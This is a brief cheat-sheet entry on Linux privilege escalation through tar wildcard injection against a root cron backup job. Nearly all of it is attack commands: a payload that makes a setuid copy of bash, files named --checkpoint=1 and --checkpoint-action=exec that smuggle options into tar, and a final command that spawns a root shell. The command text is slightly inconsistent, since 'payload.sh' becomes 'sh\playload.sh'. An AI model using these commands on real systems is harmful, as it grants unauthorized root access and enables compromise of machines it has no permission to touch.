Linux privilege escalation with tar
- Escalation
It is possible to raise these privileges with the tar command and the use of wildcard. Typically with a cron executed with the root user.
cron
*/1 * * * * root tar -zcf /var/backups/home-john.tgz /home/john/*
Exploitation
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > /home/john/payload.sh chmod +x /home/john/payload.sh touch /home/john/--checkpoint=1 touch /home/john/--checkpoint-action=exec=sh\playload.sh
Escalation
/tmp/bash -p